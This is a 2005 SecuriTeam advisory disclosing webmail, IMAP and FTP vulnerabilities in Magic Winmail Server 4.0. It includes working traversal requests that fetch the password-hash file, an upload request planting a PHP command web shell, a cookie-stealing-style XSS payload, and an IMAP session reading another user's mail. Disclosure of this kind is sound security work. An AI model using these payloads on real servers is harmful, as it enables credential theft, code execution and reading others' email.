[NT] Magic Winmail Server's Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/05

  • Next message: SecuriTeam: "[NT] Windows 2000 GetEnhMetaFilePaletteEntries() DoS"
    To: list@securiteam.com
    Date: 17 Mar 2005 19:24:47 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Magic Winmail Server's Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.magicwinmail.net/> Magic Winmail Server is an enterprise
    class mail server software system offering a robust feature set, including
    extensive security measures. Winmail Server supports SMTP, POP3, IMAP,
    Webmail, LDAP, multiple domains, SMTP authentication, SPAM protection,
    anti-virus protection, SSL/TLS security, Network Storage, remote access,
    Web-based administration, and a wide array of standard email options such
    as filtering, signatures, real-time monitoring, archiving, and public
    email folders."

    Multiple vulnerabilities were found in Magic Winmail Server's Webmail
    service, IMAP service and FTP service.

    DETAILS

    Vulnerable Systems:
     * Magic Winmail Server version 4.0 build 1112

    Winmail Server's PHP-based Webmail has vulnerabilities that may be
    exploited to download arbitrary files from the server, to upload files to
    arbitrary directories, and to conduct Cross-Site Scripting attacks.
    Directory traversal vulnerability in Winmail Server's IMAP service gives
    the malicious user the ability to read arbitrary user's emails,
    create/delete arbitrary directories on the server, and/or to retrieve
    arbitrary files from the server. In addition, Winmail Server's FTP service
    does not validate the IP address supplied in a PORT command. This may be
    exploited to perform port scan from the FTP server.

    Vulnerabilities in Webmail:
    The download.php script allows a user to download his/her email file
    attachment. Lack of input parameter sanitation allows a logon mail user to
    retrieve arbitrary files from the server by supplying specially crafted
    input parameters to download.php. The following two requests will retrieve
    userauth.cfg, which contains users' MD5 password hashes.

    http://[hostname]:6080/download.php?
    sid=656041e927559a2ff& // this must be the current session id
    tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime
    &filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==
    // Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of
    /../../../../userauth.cfg

    http://[hostname]:6080/download.php?
    sid=656041e927559a2ff&
    tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1
    &filename=/../../../../userauth.cfg

    The upload.php scripts allows a mail user to upload his/her email file
    attachment when composing an email. Lack of input sanitation of the
    supplied filename allows a logon mail user to upload files to arbitrary
    location on the server. This may be exploited to upload arbitrary PHP
    scripts into the webmail directory. Successful exploitation on the default
    installation of Winmail server will allow execution of arbitrary PHP
    scripts with LOCAL SYSTEM privilege.

    -----------------------------31140333525651
    Content-Disposition: form-data; name="userfile1";
    filename="/../../../a.php"
    Content-Type: application/download

    <?php
    system($_GET[cmd]);
    ?>

    The /admin/user.php script allows the Webmail administrator to view
    webmail users' username, fullname, description, and company name. A
    malicious user may input JavaScript in his own personal info using
    userinfo.php. Due to lack of filtering of HTML special characters, these
    JavaScript will execute on the Webmail administrator's browser when the
    administrator accesses the /admin/user.php script. These JavaScripts may
    be crafted to steal the administrator's session cookie, etc. For example,
    the user may set his description to
    <script>alert(document.form1.sid.value);</script>

    Directory Traversal Vulnerability in IMAP Service:
    Directory traversal vulnerability was found in several of Winmail Server's
    IMAP commands. These vulnerable commands may be exploited by a malicious
    logon user to read arbitrary user's emails, create/delete arbitrary
    directories on the server, and/or to retrieve arbitrary files from the
    server. IMAP commands like CREATE, EXAMINE, SELECT and DELETE are affected
    by this vulnerability.

    The following transcript of an IMAP session illustrates this:

    [c:\]nc X.X.X.X 143
    * OK IMAP4 ready! localhost Winmail Mail Server MagicWinmail Extend IMAP
    101
    1 LOGIN "test" "password" // login as user test
    1 OK LOGIN OK.
    2 SELECT "../test2/INBOX" // selected user test2's mailbox
    * FLAGS (\Answered \Deleted \Draft \Seen \Recent)
    * OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
    * 1 EXISTS
    * 0 RECENT
    * OK [UNSEEN 1] Message 1 is unseen.
    * OK [UIDNEXT 2] Predicted valid
    * OK [UIDVALIDITY 1105791403] UIDs valid
    2 OK [READ-WRITE] OK SELECT completed.
    3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // retrieve test2's
    mail
    * 1 FETCH (UID 1 FLAGS () RFC822.SIZE 271 BODY[] {422}
    Return-Path:
    Delivered-To: test2@xxx.xx
    Received: (winmail server invoked for smtp delivery); Sat, 15 Jan 2005
    20:16:18
    +0800
    Received: (winmail server invoked for report); Sat, 15 Jan 2005 20:16:18
    +0800
    From: postmaster@xxx.xx
    To: test2@xxx.xx
    Date: Sat, 15 Jan 2005 20:16:18 +0800
    Subject: welcome
    Hi, test2
    Welcome to use the mail system!
    Your mail address is test2@xxx.xx.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Windows 2000 GetEnhMetaFilePaletteEntries() DoS"

    Relevant Pages

    • security-basics Digest of: get.123_145
      ... VPN to ASP a security risk? ... Re: Multiple IPSec tunnels? ... Subject: Security NT Server ... VPN to ASP a security risk? ...
      (Security-Basics)
    • << SBS News of the week - Sept 26 >>
      ... And he points to the info you need to put the file on the server in the ... at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... by the firewall at risk. ...
      (microsoft.public.backoffice.smallbiz)
    • << SBS News of the week - Sept 26 >>
      ... And he points to the info you need to put the file on the server in the ... at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... by the firewall at risk. ...
      (microsoft.public.backoffice.smallbiz2000)
    • Re: << SBS News of the week - Sept 26 >>
      ... > And he points to the info you need to put the file on the server in the ... > at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... An attacker can exploit these flaws in tandem via specially ...
      (microsoft.public.backoffice.smallbiz2000)
    • << SBS News of the week - Sept 26 >>
      ... And he points to the info you need to put the file on the server in the ... at the network perimeter. ... The Symantec Firewall/VPN and the Gateway Security ... by the firewall at risk. ...
      (microsoft.public.windows.server.sbs)